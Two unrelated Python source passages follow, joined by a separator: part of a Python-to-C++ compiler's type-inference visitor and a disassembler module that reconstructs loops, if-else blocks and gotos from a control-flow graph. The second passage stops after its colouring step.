    for cl in [newclass, newclass.parent]:
        for ident in ['__setattr__', '__getattr__']:
            func = Function(self.gx, mv=getmv())
            func.ident = ident
            func.parent = cl
            if ident == '__setattr__':
                func.formals = ['name', 'whatsit']
                retexpr = Return(Name('None'))
                self.visit(retexpr, func)
            elif ident == '__getattr__':
                func.formals = ['name']
            cl.funcs[ident] = func
    # --- built-in attributes
    if 'class_' in getmv().classes or 'class_' in getmv().ext_classes:
        var = default_var(self.gx, '__class__', newclass)
        var.invisible = True
        self.gx.types[inode(self.gx, var)] = set([(def_class(self.gx, 'class_'), def_class(self.gx, 'class_').dcpa)])
        def_class(self.gx, 'class_').dcpa += 1
    # --- staticmethod, property
    skip = []
    for child in node.code.getChildNodes():
        if isinstance(child, Assign) and len(child.nodes) == 1:
            lvalue, rvalue = child.nodes[0], child.expr
            if isinstance(lvalue, AssName) and isinstance(rvalue, CallFunc) and isinstance(rvalue.node, Name) and rvalue.node.name in ['staticmethod', 'property']:
                if rvalue.node.name == 'property':
                    if len(rvalue.args) == 1 and isinstance(rvalue.args[0], Name):
                        newclass.properties[lvalue.name] = rvalue.args[0].name, None
                    elif len(rvalue.args) == 2 and isinstance(rvalue.args[0], Name) and isinstance(rvalue.args[1], Name):
                        newclass.properties[lvalue.name] = rvalue.args[0].name, rvalue.args[1].name
                    else:
                        error("complex properties are not supported", self.gx, rvalue, mv=getmv())
                else:
                    newclass.staticmethods.append(lvalue.name)
                skip.append(child)
    # --- children
    for child in node.code.getChildNodes():
        if child not in skip:
            cl = self.classes[node.name]
            if isinstance(child, FunctionNode):
                self.visit(child, cl)
            else:
                cl.parent.static_nodes.append(child)
                self.visit(child, cl.parent)
    # --- __iadd__ etc.
    if not newclass.mv.module.builtin or newclass.ident in ['int_', 'float_', 'str_', 'tuple', 'complex']:
        msgs = ['add', 'mul']  # XXX mod, pow
        if newclass.ident in ['int_', 'float_']:
            msgs += ['sub', 'div', 'floordiv']
        if newclass.ident in ['int_']:
            msgs += ['lshift', 'rshift', 'and', 'xor', 'or']
        for msg in msgs:
            if not '__i' + msg + '__' in newclass.funcs:
                self.visit(FunctionNode(None, '__i' + msg + '__', ['self', 'other'], [], 0, None, Stmt([Return(CallFunc(Getattr(Name('self'), '__' + msg + '__'), [Name('other')], None, None))])), newclass)
    # --- __str__, __hash__ # XXX model in lib/builtin.py, other defaults?
    if not newclass.mv.module.builtin and not '__str__' in newclass.funcs:
        self.visit(FunctionNode(None, '__str__', ['self'], [], 0, None, Return(CallFunc(Getattr(Name('self'), '__repr__'), []))), newclass)
        newclass.funcs['__str__'].invisible = True
    if not newclass.mv.module.builtin and not '__hash__' in newclass.funcs:
        self.visit(FunctionNode(None, '__hash__', ['self'], [], 0, None, Return(Const(0)), []), newclass)
        newclass.funcs['__hash__'].invisible = True
def visitGetattr(self, node, func=None, callfunc=False):
    """Model attribute access as a fake __getattr__ call."""
    if node.attrname in ['__doc__']:
        error('%s attribute is not supported' % node.attrname, self.gx, node, mv=getmv())
    newnode = CNode(self.gx, node, parent=func, mv=getmv())
    self.gx.types[newnode] = set()
    fakefunc = CallFunc(FakeGetattr(node.expr, '__getattr__'), [Const(node.attrname)])
    self.visit(fakefunc, func)
    self.add_constraint((self.gx.cnode[fakefunc, 0, 0], newnode), func)
    self.callfuncs.append((fakefunc, func))
    if not callfunc:
        # not a direct method call: the attribute may denote a function/class
        self.fncl_passing(node, newnode, func)
def visitConst(self, node, func=None):
    """Seed a literal with its builtin class (Python 2 'compiler' AST:
    'unicode' and 'long' are the Python 2 builtins)."""
    if type(node.value) == unicode:
        error('unicode is not supported', self.gx, node, mv=getmv())
    map = {int: 'int_', str: 'str_', float: 'float_', type(None): 'none', long: 'int_', complex: 'complex'}  # XXX 'return' -> Return(Const(None))?
    self.instance(node, def_class(self.gx, map[type(node.value)]), func)
def fncl_passing(self, node, newnode, func):
    """Handle a function or class used as a value (passed or stored).

    Returns True when *node* names a known function/class (builtins are
    wrapped in a generated lambda so they can be passed around), False
    otherwise.
    """
    lfunc, lclass = lookup_func(node, getmv()), lookup_class(node, getmv())
    if lfunc:
        if lfunc.mv.module.builtin:
            lfunc = self.builtin_wrapper(node, func)
        elif lfunc.ident not in lfunc.mv.lambdas:
            lfunc.lambdanr = len(lfunc.mv.lambdas)
            lfunc.mv.lambdas[lfunc.ident] = lfunc
        self.gx.types[newnode] = set([(lfunc, 0)])
    elif lclass:
        if lclass.mv.module.builtin:
            lclass = self.builtin_wrapper(node, func)
        else:
            lclass = lclass.parent
        self.gx.types[newnode] = set([(lclass, 0)])
    else:
        return False
    newnode.copymetoo = True  # XXX merge into some kind of 'seeding' function
    return True
def visitName(self, node, func=None):
    """Resolve a name: constants, globals, locals, or funcs/classes."""
    newnode = CNode(self.gx, node, parent=func, mv=getmv())
    self.gx.types[newnode] = set()
    if node.name == '__doc__':
        error("'%s' attribute is not supported" % node.name, self.gx, node, mv=getmv())
    if node.name in ['None', 'True', 'False']:
        if node.name == 'None':  # XXX also bools, remove def seed_nodes()
            self.instance(node, def_class(self.gx, 'none'), func)
        else:
            self.instance(node, def_class(self.gx, 'bool_'), func)
        return
    if isinstance(func, Function) and node.name in func.globals:
        var = default_var(self.gx, node.name, None, mv=getmv())
    else:
        var = lookup_var(node.name, func, mv=getmv())
        if not var:
            # unknown name: perhaps a function/class being passed around
            if self.fncl_passing(node, newnode, func):
                pass
            elif node.name in ['int', 'float', 'str']:  # XXX
                cl = self.ext_classes[node.name + '_']
                self.gx.types[newnode] = set([(cl.parent, 0)])
                newnode.copymetoo = True
            else:
                var = default_var(self.gx, node.name, None, mv=getmv())
    if var:
        self.add_constraint((inode(self.gx, var), newnode), func)
        for a, b in self.gx.filterstack:
            if var.name == a.name:
                self.gx.filters[node] = lookup_class(b, getmv())
def builtin_wrapper(self, node, func):
    """Wrap a builtin function/class in a 5-argument lambda so it can be
    passed around as a value; returns the generated wrapper function."""
    node2 = CallFunc(copy.deepcopy(node), [Name(x) for x in 'abcde'])
    l = Lambda(list('abcde'), [], 0, node2)
    self.visit(l, func)
    self.lwrapper[node] = self.lambdaname[l]
    self.gx.lambdawrapper[node2] = self.lambdaname[l]
    f = self.lambdas[self.lambdaname[l]]
    f.lambdawrapper = True
    inode(self.gx, node2).lambdawrapper = f
    return f
def parse_module(name, gx, parent=None, node=None):
    """Locate, parse and visit a module; return the (possibly cached) Module.

    The module visitor is swapped in around the dispatch and restored
    afterwards so nested imports keep a consistent current-visitor.
    """
    # --- valid name?
    if not re.match("^[a-zA-Z0-9_.]+$", name):
        print ("*ERROR*:%s.py: module names should consist of letters, digits and underscores" % name)
        sys.exit(1)
    # --- create module
    try:
        # the importing module's directory is searched before the cwd
        if parent and parent.path != os.getcwd():
            basepaths = [parent.path, os.getcwd()]
        else:
            basepaths = [os.getcwd()]
        module_paths = basepaths + gx.libdirs
        absolute_name, filename, relative_filename, builtin = find_module(gx, name, module_paths)
        module = Module(absolute_name, filename, relative_filename, builtin, node)
    except ImportError:
        error('cannot locate module: ' + name, gx, node, mv=getmv())
    # --- check cache
    if module.name in gx.modules:  # cached?
        return gx.modules[module.name]
    gx.modules[module.name] = module
    # --- not cached, so parse
    module.ast = parse_file(module.filename)
    old_mv = getmv()
    module.mv = mv = ModuleVisitor(module, gx)
    setmv(mv)
    mv.visit = mv.dispatch
    mv.visitor = mv
    mv.dispatch(module.ast)
    module.import_order = gx.import_order
    gx.import_order += 1
    # restore the previous visitor for the importing module
    mv = old_mv
    setmv(mv)
    return module
|
import sys
from time import time
from plasma.lib.ast import (Ast_Branch, Ast_Goto, Ast_Loop, Ast_If_cond,
Ast_IfGoto, Ast_Ifelse, Ast_AndIf, Ast_Comment)
from plasma.lib.utils import BRANCH_NEXT, BRANCH_NEXT_JUMP, debug__
from plasma.lib.exceptions import ExcIfelse
from plasma.lib.colors import pick_color
class Endpoint():
    """A point where several AST paths meet during endpoint search."""

    def __init__(self, ast, unseen, l_start):
        # one entry per path that has arrived so far
        self.ast = [ast]
        self.loop_start = [l_start]
        # predecessors that have not reached this point yet
        self.unseen = unseen

    def rendezvous(self, ast, prev, l_start):
        """Record another path arriving via predecessor *prev*."""
        self.loop_start.append(l_start)
        self.ast.append(ast)
        if prev in self.unseen:
            self.unseen.remove(prev)
def assign_colors(libarch, ctx, ast):
    """Walk the AST and pick a color for every jump target address."""
    if isinstance(ast, Ast_Branch):
        for n in ast.nodes:
            if isinstance(n, list):
                # a basic block: color the target of a trailing unconditional
                # immediate jump, if the graph knows its successor
                if libarch.utils.is_uncond_jump(n[0]) and \
                        n[0].operands[0].type == libarch.utils.OP_IMM and \
                        n[0].address in ctx.gph.link_out:
                    nxt = ctx.gph.link_out[n[0].address][BRANCH_NEXT]
                    pick_color(nxt)
            else:  # ast
                assign_colors(libarch, ctx, n)
    elif isinstance(ast, Ast_IfGoto) or isinstance(ast, Ast_Goto):
        pick_color(ast.addr_jump)
    elif isinstance(ast, Ast_Ifelse):
        assign_colors(libarch, ctx, ast.br_next_jump)
        assign_colors(libarch, ctx, ast.br_next)
    elif isinstance(ast, Ast_Loop):
        assign_colors(libarch, ctx, ast.branch)
def get_first_addr(ast):
    """Return the address of the first instruction in *ast*, or -1."""
    # Assume that there are no Ast_Comment
    if isinstance(ast, list):
        return ast[0].address
    if isinstance(ast, Ast_Branch):
        if len(ast.nodes) > 0:
            return get_first_addr(ast.nodes[0])
    if isinstance(ast, Ast_Ifelse):
        # Any instructions at the moment so we can use the jump inst
        return ast.jump_inst.address
    if isinstance(ast, Ast_Loop):
        if len(ast.branch.nodes) > 0:
            return get_first_addr(ast.branch.nodes[0])
    if isinstance(ast, Ast_Goto):
        return ast.addr_jump
    if isinstance(ast, Ast_IfGoto):
        return ast.orig_jump.address
    if isinstance(ast, Ast_AndIf):
        return ast.orig_jump.address
    if isinstance(ast, Ast_If_cond):
        if len(ast.br.nodes) > 0:
            return get_first_addr(ast.br.nodes[0])
    # empty container or unknown node kind
    return -1
def get_next_addr(ast):
    """Return the first address of the node following *ast*, or -1."""
    parent = ast.parent
    if parent is None:
        return -1
    nxt_idx = ast.idx_in_parent + 1
    if nxt_idx < len(parent.nodes):
        return get_first_addr(parent.nodes[nxt_idx])
    # *ast* is the last child: the next address is the parent's next address
    return get_next_addr(parent)
def is_last_in_loop(ast, i):
    """If ast.nodes[i] is the last node of an enclosing loop body, return
    that loop's first address; otherwise return -1."""
    par = ast.parent
    if par is None:
        return -1
    is_last = i == len(ast.nodes) - 1
    a = ast.parent.nodes[ast.idx_in_parent]
    if isinstance(a, Ast_Loop) and is_last:
        return get_first_addr(a)
    if not is_last:
        return -1
    # last within this branch: keep climbing toward an enclosing loop
    return is_last_in_loop(par, ast.idx_in_parent)
def remove_all_unnecessary_goto(ast):
    """Drop trailing Ast_Goto nodes whose target is the next address anyway.

    Recurses into branches, if/else arms and loop bodies. A goto marked
    'dont_remove', or preceded by an Ast_AndIf, is always kept.
    """
    if isinstance(ast, Ast_Branch):
        # Remove all last Ast_Goto, only if the previous is not an andif
        if len(ast.nodes) > 0 and isinstance(ast.nodes[-1], Ast_Goto):
            if len(ast.nodes) <= 1 or not isinstance(ast.nodes[-2], Ast_AndIf):
                if not ast.nodes[-1].dont_remove:
                    nxt = get_next_addr(ast)
                    if ast.nodes[-1].addr_jump == nxt:
                        del ast.nodes[-1]
        for n in ast.nodes:
            if not isinstance(n, list):
                remove_all_unnecessary_goto(n)
    elif isinstance(ast, Ast_Ifelse):
        remove_all_unnecessary_goto(ast.br_next)
        remove_all_unnecessary_goto(ast.br_next_jump)
    elif isinstance(ast, Ast_Loop):
        # guard against an empty loop body before peeking at nodes[-1]
        # (the original unconditionally indexed nodes[-1] -> IndexError)
        if ast.branch.nodes and isinstance(ast.branch.nodes[-1], Ast_Goto):
            # a goto back to the loop head is implicit in the loop itself
            if get_first_addr(ast) == ast.branch.nodes[-1].addr_jump:
                del ast.branch.nodes[-1]
        remove_all_unnecessary_goto(ast.branch)
def fix_non_consecutives(ctx, ast):
    """Insert Ast_Goto nodes wherever two consecutive AST entries are not
    at consecutive addresses, so the fall-through transfer stays visible.

    Recurses into branches, if/else arms and loop bodies; only basic
    blocks (lists of instructions) can require an inserted goto.
    """
    if isinstance(ast, Ast_Branch):
        idx_to_add = {}
        for i, n in enumerate(ast.nodes):
            if isinstance(n, list):
                ad = n[0].address
                if ad in ctx.gph.uncond_jumps_set or ad not in ctx.gph.link_out:
                    continue
                nxt1 = ctx.gph.link_out[ad][BRANCH_NEXT]
                if i == len(ast.nodes) - 1:
                    # last node: falling through to the start of an
                    # enclosing loop needs no goto
                    loop_start = is_last_in_loop(ast, i)
                    if loop_start != -1:
                        if nxt1 != loop_start:
                            idx_to_add[i + 1] = nxt1
                        continue
                    nxt2 = get_next_addr(ast)
                else:
                    nxt2 = get_first_addr(ast.nodes[i + 1])
                if nxt1 != nxt2:
                    idx_to_add[i + 1] = nxt1
            else:
                fix_non_consecutives(ctx, n)
        if not idx_to_add:
            return
        # Insert from the end of the nodes list so earlier insertion
        # indices remain valid
        for i in sorted(idx_to_add, reverse=True):
            ast.nodes.insert(i, Ast_Goto(idx_to_add[i]))
    elif isinstance(ast, Ast_Ifelse):
        fix_non_consecutives(ctx, ast.br_next)
        fix_non_consecutives(ctx, ast.br_next_jump)
    elif isinstance(ast, Ast_Loop):
        fix_non_consecutives(ctx, ast.branch)
def search_endpoint(ctx, ast, entry, l_set, l_prev_loop, l_start):
    """Find the endpoint of an 'if' starting at *entry*, or -1.

    An endpoint found inside a subloop is rejected: the end of an 'if'
    cannot legitimately land in a loop.
    """
    found = __search_endpoint(ctx, ast, entry, l_set, l_prev_loop, l_start)
    if found == -1:
        return -1
    # Restrict to the current loop only (l_set also contains subloops);
    # outside any loop, use the not-in-loop node set.
    if l_prev_loop == -1:
        current = ctx.gph.not_in_loop
    else:
        current = ctx.gph.loops_set[(l_prev_loop, l_start)]
    return found if found in current else -1
def __push_empty_waiting(stack, waiting, done):
    """Move every fully-satisfied waiting address onto the work stack."""
    satisfied = [ad for ad, deps in waiting.items() if len(deps) == 0]
    for ad in satisfied:
        del waiting[ad]
        done.add(ad)
        # -1 marks a synthetic predecessor for re-queued nodes
        stack.append((-1, ad))
def __search_endpoint(ctx, ast, entry, l_set, l_prev_loop, l_start):
    """Graph search for the reconvergence point of the branch at `entry`.

    Explores all paths leaving `entry` with a DFS stack. A node with
    several incoming links is parked in `waiting` until all its
    reachable predecessors have been seen; when exactly one node
    remains and nothing else is pending, that node is the endpoint.
    Returns the endpoint address or -1.

    waiting: address -> set of still-unseen predecessor addresses
    """
    waiting = {}
    visited = set()
    done = set()
    stack = []
    first_nxt = []
    for n in ctx.gph.link_out[entry]:
        stack.append((entry, n))
        first_nxt.append(n)
    while 1:
        while stack:
            prev, ad = stack.pop(-1)
            # Don't go outside the current loop : we want to search
            # an if-endpoint.
            if l_prev_loop != -1 and ad not in l_set:
                continue
            # If "ad" is in last_node_loop we are sure that the path
            # will loop. So don't keep it if it's a subloop.
            if ad in ctx.gph.last_node_loop and \
                    (l_prev_loop, l_start) not in ctx.gph.last_node_loop[ad]:
                continue
            # If endpoint == loop : maybe the endpoint is at the end of the loop
            # If we have multiple link in, and if it's not a new loop, wait
            if ad not in done:
                lkin = ctx.gph.link_in[ad]
                if ad == l_start or len(lkin) > 1:
                    unseen = get_unseen_links_in(ad, l_set, l_prev_loop, l_start)
                    if len(unseen) > 1:
                        if ad in waiting:
                            if prev in waiting[ad]:
                                waiting[ad].remove(prev)
                        else:
                            unseen.remove(prev)
                            waiting[ad] = unseen
                        continue
            if ad in visited:
                continue
            visited.add(ad)
            if ad in ctx.gph.link_out:
                for n in ctx.gph.link_out[ad]:
                    stack.append((ad, n))
        if not waiting:
            return -1
        # Now the stack is empty, but there are still some waiting nodes.
        __push_empty_waiting(stack, waiting, done)
        # If the stack is still empty but if we have still some waiting
        # nodes, search if paths are really possible. If not, delete
        # a dependence.
        if not stack and waiting:
            for ad in set(waiting):
                for i in set(waiting[ad]):
                    if not ctx.gph.path_exists(entry, i, l_start):
                        waiting[ad].remove(i)
            __push_empty_waiting(stack, waiting, done)
        # It means that there was still one node in waiting without
        # remaining dependencies and it was moved in stack.
        if len(stack) == 1 and not waiting:
            endp = stack[0][1]
            # Check to be sure, see tests/analyzer/ifexit.c
            v = True
            for n in first_nxt:
                v &= ctx.gph.path_exists(n, endp, l_start)
            if not v:
                return -1
            return endp
        if not stack:
            return -1
        # the while 1 continue...
def get_unseen_links_in(ad, l_set, l_prev_loop, l_start):
    """Return the incoming links of `ad` that still count as unseen.

    Back-edges from a subloop that starts at `ad` are ignored, and when
    a loop context is given (`l_set` not None) links coming from outside
    the current loop are ignored too. Reads the module-level `ctx`.
    `l_prev_loop` is unused but kept for a uniform signature.
    """
    preds = ctx.gph.link_in[ad]
    unseen = set(preds)
    # Is `ad` the head of a subloop? Its internal back-edges never
    # count as pending predecessors.
    if (l_start, ad) in ctx.gph.loops_all:
        sub_loop = ctx.gph.loops_all[(l_start, ad)]
        unseen.difference_update(p for p in preds if p in sub_loop)
    if l_set is None:
        return unseen
    # Drop external jumps which come from outside the current loop.
    unseen.difference_update(p for p in preds if p not in l_set)
    return unseen
def remove_unnecessary_goto(ast, ad):
    """Drop a trailing Ast_Goto targeting `ad` from the branch.

    Such a goto is redundant at this point of the construction; the
    branch is left untouched when the goto is its only node.
    """
    if len(ast.nodes) <= 1:
        return
    last = ast.nodes[-1]
    if isinstance(last, Ast_Goto) and last.addr_jump == ad:
        ast.nodes.pop(-1)
def rm_waiting(ctx, waiting, ad):
    """Resolve the endpoint `ad`: pick the branch the walk continues on.

    Among all ASTs that rendezvoused on `ad`, the one with the smallest
    nesting level continues; every other branch receives an Ast_Goto so
    its fall-through to `ad` stays explicit. The Endpoint entry for `ad`
    is removed from `waiting`. Returns the chosen Ast_Branch.
    """
    # Get the ast which has the smallest level
    min_level_idx = -1
    list_ast = waiting[ad].ast
    list_loop_start = waiting[ad].loop_start
    for i, a in enumerate(list_ast):
        # Branches that reached `ad` through a false loop are not candidates.
        if (list_loop_start[i], ad) in ctx.gph.false_loops:
            continue
        if min_level_idx == -1 or a.level < list_ast[min_level_idx].level:
            min_level_idx = i
    if min_level_idx == -1:
        print("errorD: this is a bug, please report")
        sys.exit(1)
    ast = list_ast[min_level_idx]
    # Add a goto on each other ast. If one turns out to be useless it is
    # deleted by the later goto-cleanup passes.
    for i, a in enumerate(list_ast):
        if i == min_level_idx:
            continue
        if len(a.nodes) == 0:
            a.add(Ast_Goto(ad))
            continue
        # The previous instruction has not `ad` as the next instruction
        if isinstance(a.nodes[-1], list):
            prev = a.nodes[-1][0].address
            if prev in ctx.gph.uncond_jumps_set:
                continue
            if prev in ctx.gph.link_out:
                n = ctx.gph.link_out[prev][BRANCH_NEXT]
                if n != ad:
                    a.add(Ast_Goto(n))
            continue
        # The previous is a goto, skip it
        if isinstance(a.nodes[-1], Ast_Goto):
            continue
        a.add(Ast_Goto(ad))
    waiting[ad].ast.clear()
    del waiting[ad]
    return ast
def manage_endpoint(ctx, waiting, ast, prev, ad, l_set, l_prev_loop,
                    l_start, ad_is_visited):
    """Handle arrival (or prediction of arrival) at a join point `ad`.

    Returns the Ast_Branch on which the walk must continue, or None when
    the walker has to stop here and wait for the other incoming paths.
    Addresses with at most one incoming link are never join points and
    pass straight through.

    :param prev: address we came from (-1 / meaningless when
                 ad_is_visited is False)
    :param ad_is_visited: False when this call only *registers* a future
                          endpoint (seen from an if-else lookahead)
    """
    if ad not in ctx.gph.link_in or len(ctx.gph.link_in[ad]) <= 1:
        return ast
    # If ad_is_visited is False it means this is a prevision for a future
    # visit on this node. Here prev has no sense.
    if not ad_is_visited:
        if ad not in waiting:
            unseen = get_unseen_links_in(ad, l_set, l_prev_loop, l_start)
            waiting[ad] = Endpoint(ast, unseen, l_start)
        return None
    if ad in waiting:
        # One more incoming path has arrived; continue only when all
        # expected predecessors have been seen.
        waiting[ad].rendezvous(ast, prev, l_start)
        if len(waiting[ad].unseen) != 0:
            return None
        ast = rm_waiting(ctx, waiting, ad)
        return ast
    unseen = get_unseen_links_in(ad, l_set, l_prev_loop, l_start)
    if len(unseen) > 1:
        unseen.remove(prev)
        waiting[ad] = Endpoint(ast, unseen, l_start)
        return None
    return ast
def generate_ast(ctx__):
    """Build the AST of the current function from its control-flow graph.

    Iterative DFS over ctx.gph: basic blocks are appended to branch
    nodes; loops, if/else, if-goto and and-if constructs are created on
    the fly; diverging paths are re-joined through the `waiting`
    endpoints (see manage_endpoint / rm_waiting). After the walk, goto
    cleanup passes and the per-arch post-processing functions run.

    Returns (ast, ok) — ok is False when some endpoints could not be
    resolved, in which case a warning comment is prepended to the output.
    """
    global ctx
    ctx = ctx__
    start = time()
    ast = Ast_Branch()
    ast.parent = None
    # stack entries: (current branch, loops_stack, prev addr, curr addr,
    #                 else_addr of the enclosing if-else)
    stack = [(ast, [], -1, ctx.entry, -1)]
    visited = set()
    waiting = {}
    ast_head = ast
    # Branch with an "infinite" level: rm_waiting never selects it, so
    # nodes pushed on it stay invisible in the final output.
    fake_br = Ast_Branch()
    fake_br.level = sys.maxsize
    libarch = ctx.gctx.libarch
    while stack or waiting:
        if not stack and waiting:
            # Only force the remaining endpoints when the loop analysis
            # was skipped; otherwise this is a real failure (see below).
            if not ctx.gph.skipped_loops_analysis:
                break
            for ad in set(waiting):
                waiting[ad].unseen.clear()
                stack.append((fake_br, [], -1, ad, -1))
        ast, loops_stack, prev, curr, else_addr = stack.pop(-1)
        # Check if we enter in a false loop (see gotoinloop*)
        if loops_stack:
            _, _, l_start = loops_stack[-1]
        else:
            l_start = ctx.entry
        blk = ctx.gph.nodes[curr]
        # Exit the current loop
        while loops_stack:
            l_ast, l_prev_loop, l_start = loops_stack[-1]
            l_set = ctx.gph.loops_all[(l_prev_loop, l_start)]
            if curr not in l_set:
                loops_stack.pop(-1)
                ast = l_ast.parent
                # Name the address we break to, for readability.
                if curr not in ctx.gctx.db.reverse_symbols:
                    name = "break_0x%x" % curr
                    ctx.gctx.db.symbols[name] = curr
                    ctx.gctx.db.reverse_symbols[curr] = name
                    ctx.gctx.db.modified = True
            else:
                break
        if not loops_stack:
            l_prev_loop = -1
            l_start = ctx.entry
            l_set = None
        level = ast.level
        if curr not in visited:
            # Check if we need to stop and wait on a node
            a = manage_endpoint(ctx, waiting, ast, prev, curr, l_set,
                                l_prev_loop, l_start, True)
            if a is None:
                continue
            ast = a
            remove_unnecessary_goto(ast, curr)
            # Check if we enter in a new loop
            if (l_start, curr) in ctx.gph.loops_all:
                if not ctx.gctx.is_interactive or curr in ctx.gctx.db.xrefs:
                    do = True
                    if curr in ctx.gctx.db.reverse_symbols:
                        # Don't overwrite a user symbol; break_ names may
                        # be replaced by a loop_ name.
                        if not ctx.gctx.db.reverse_symbols[curr].startswith("break_"):
                            do = False
                    if do:
                        name = "loop_0x%x" % curr
                        ctx.gctx.db.symbols[name] = curr
                        ctx.gctx.db.reverse_symbols[curr] = name
                        ctx.gctx.db.modified = True
                level += 1
                a = Ast_Loop()
                a.level = level
                a.parent = ast
                a.idx_in_parent = len(ast.nodes)
                a.branch.parent = ast
                a.branch.level = level
                a.branch.idx_in_parent = len(ast.nodes)
                ast.add(a)
                ast = a.branch
                loops_stack.append((a, l_start, curr))
                else_addr = -1
                l_ast = a
                l_set = ctx.gph.loops_all[(l_start, curr)]
                l_prev_loop = l_start
                l_start = curr
                if (l_prev_loop, l_start) in ctx.gph.infinite_loop:
                    a.is_infinite = True
        # Here curr may have changed
        if curr in visited:
            if curr == l_start:
                continue
            # Re-visit of a known block: keep only an explicit goto.
            if len(ast.nodes) > 0:
                if isinstance(ast.nodes[-1], list):
                    prev = ast.nodes[-1][0].address
                    if prev not in ctx.gph.uncond_jumps_set:
                        ast.add(Ast_Goto(curr))
                else:
                    ast.add(Ast_Goto(curr))
            continue
        visited.add(curr)
        # Return instruction
        if curr not in ctx.gph.link_out:
            if curr != ctx.entry and \
                    (not ctx.gctx.is_interactive or curr in ctx.gctx.db.xrefs):
                do = True
                if curr in ctx.gctx.db.reverse_symbols:
                    if not ctx.gctx.db.reverse_symbols[curr].startswith("break_"):
                        do = False
                if do:
                    name = "ret_0x%x" % curr
                    ctx.gctx.db.symbols[name] = curr
                    ctx.gctx.db.reverse_symbols[curr] = name
                    ctx.gctx.db.modified = True
            ast.add(blk)
            continue
        nxt = ctx.gph.link_out[curr]
        if curr in ctx.gctx.dis.jmptables:
            # Jump table: explore every target on the same branch.
            ast.add(blk)
            for n in nxt:
                stack.append((ast, loops_stack, curr, n, else_addr))
        elif len(nxt) == 2:
            # We are on a conditional jump
            prefetch = blk[1] if len(blk) == 2 else None
            if loops_stack:
                goto_set = False
                c1 = nxt[BRANCH_NEXT] not in l_set
                c2 = nxt[BRANCH_NEXT_JUMP] not in l_set
                if c1 and c2:
                    raise ExcIfelse(curr)
                if c1:
                    exit_loop = nxt[BRANCH_NEXT]
                    nxt_node_in_loop = nxt[BRANCH_NEXT_JUMP]
                    cond_id = libarch.utils.invert_cond(blk[0])
                    goto_set = True
                if c2:
                    exit_loop = nxt[BRANCH_NEXT_JUMP]
                    nxt_node_in_loop = nxt[BRANCH_NEXT]
                    cond_id = libarch.utils.get_cond(blk[0])
                    goto_set = True
                # goto to exit a loop
                if goto_set:
                    stack.append((ast.parent, list(loops_stack), curr,
                                  exit_loop, else_addr))
                    stack.append((ast, list(loops_stack), curr,
                                  nxt_node_in_loop, else_addr))
                    a = Ast_IfGoto(blk[0], cond_id, exit_loop, prefetch)
                    a.parent = ast
                    a.level = level
                    a.idx_in_parent = len(ast.nodes)
                    ast.add(a)
                    continue
            # and-if
            if ctx.gctx.print_andif:
                if else_addr == nxt[BRANCH_NEXT_JUMP]:
                    cond_id = libarch.utils.invert_cond(blk[0])
                    a = Ast_AndIf(blk[0], cond_id, nxt[BRANCH_NEXT], prefetch)
                    a.parent = ast
                    a.idx_in_parent = len(ast.nodes)
                    ast.add(a)
                    ast.add(Ast_Goto(nxt[BRANCH_NEXT]))
                    # Add a fake branch: when the manage_endpoint function will
                    # choose a branch to continue an endpoint (it means that
                    # all branchs to this endpoint have been reached), it will
                    # never take the fake_br because the level is set to maxint.
                    # The fake_br will be invisible
                    stack.append((fake_br, list(loops_stack), curr,
                                  nxt[BRANCH_NEXT_JUMP], else_addr))
                    stack.append((ast, list(loops_stack), curr,
                                  nxt[BRANCH_NEXT], else_addr))
                    continue
                # and-if
                if else_addr == nxt[BRANCH_NEXT]:
                    cond_id = libarch.utils.get_cond(blk[0])
                    a = Ast_AndIf(blk[0], cond_id, nxt[BRANCH_NEXT_JUMP], prefetch)
                    a.parent = ast
                    a.idx_in_parent = len(ast.nodes)
                    ast.add(a)
                    ast.add(Ast_Goto(nxt[BRANCH_NEXT_JUMP]))
                    stack.append((fake_br, list(loops_stack), curr,
                                  nxt[BRANCH_NEXT], else_addr))
                    stack.append((ast, list(loops_stack), curr,
                                  nxt[BRANCH_NEXT_JUMP], else_addr))
                    continue
            # if-else
            endpoint = search_endpoint(ctx, ast, curr, l_set, l_prev_loop, l_start)
            force_inv_if = False
            if curr in ctx.gctx.db.inverted_cond:
                nxt = list(reversed(nxt))
                force_inv_if = True
            ast_if = Ast_Branch()
            ast_if.parent = ast
            ast_if.level = level + 1
            ast_if.idx_in_parent = len(ast.nodes)
            ast_else = Ast_Branch()
            ast_else.parent = ast
            ast_else.level = level + 1
            ast_else.idx_in_parent = len(ast.nodes)
            else_addr = nxt[BRANCH_NEXT_JUMP]
            if endpoint != -1:
                if (l_start, endpoint) not in ctx.gph.false_loops:
                    # If we have already seen this address (for example the
                    # endpoint is the beginning of the current loop) we don't
                    # re-add in the waiting list.
                    if endpoint not in visited:
                        manage_endpoint(ctx, waiting, ast, -1, endpoint, l_set,
                                        l_prev_loop, l_start, False)
                else:
                    endpoint = -1
            stack.append((ast_if, list(loops_stack), curr,
                          nxt[BRANCH_NEXT], else_addr))
            if endpoint == -1:
                # No endpoint, so it's not useful to have an else-branch
                # -> the stack will continue on `ast`
                a = Ast_Ifelse(blk[0], ast_else, ast_if, else_addr, prefetch, force_inv_if)
                stack.append((ast, list(loops_stack), curr,
                              nxt[BRANCH_NEXT_JUMP], else_addr))
                a.parent = ast
                a.level = level + 1
                a.idx_in_parent = len(ast.nodes)
                ast.add(a)
                ast.add(Ast_Goto(else_addr))
            elif endpoint == else_addr:
                # Branch ast_else will be empty
                a = Ast_Ifelse(blk[0], ast_else, ast_if, endpoint, prefetch)
                # put the current ast instead of the ast_else
                # -> it's not possible to invert this condition in the visual
                stack.append((ast, list(loops_stack), curr,
                              nxt[BRANCH_NEXT_JUMP], else_addr))
                a.parent = ast
                a.level = level + 1
                a.idx_in_parent = len(ast.nodes)
                ast.add(a)
                ast.add(Ast_Goto(else_addr))
            else:
                a = Ast_Ifelse(blk[0], ast_else, ast_if, endpoint, prefetch, force_inv_if)
                stack.append((ast_else, list(loops_stack), curr,
                              nxt[BRANCH_NEXT_JUMP], else_addr))
                a.parent = ast
                a.level = level + 1
                a.idx_in_parent = len(ast.nodes)
                ast.add(a)
                ast.add(Ast_Goto(endpoint))
        else:
            # Single fall-through successor.
            ast.add(blk)
            stack.append((ast, loops_stack, curr,
                          nxt[BRANCH_NEXT], else_addr))
    ast = ast_head
    remove_all_unnecessary_goto(ast)
    fix_non_consecutives(ctx, ast)
    elapsed = time()
    elapsed = elapsed - start
    debug__("Ast generated in %fs" % elapsed)
    # Process ast
    start = time()
    for func in libarch.registered:
        func(ctx, ast)
    elapsed = time()
    elapsed = elapsed - start
    debug__("Functions for processing ast in %fs" % elapsed)
    if ctx.gctx.color:
        assign_colors(libarch, ctx, ast)
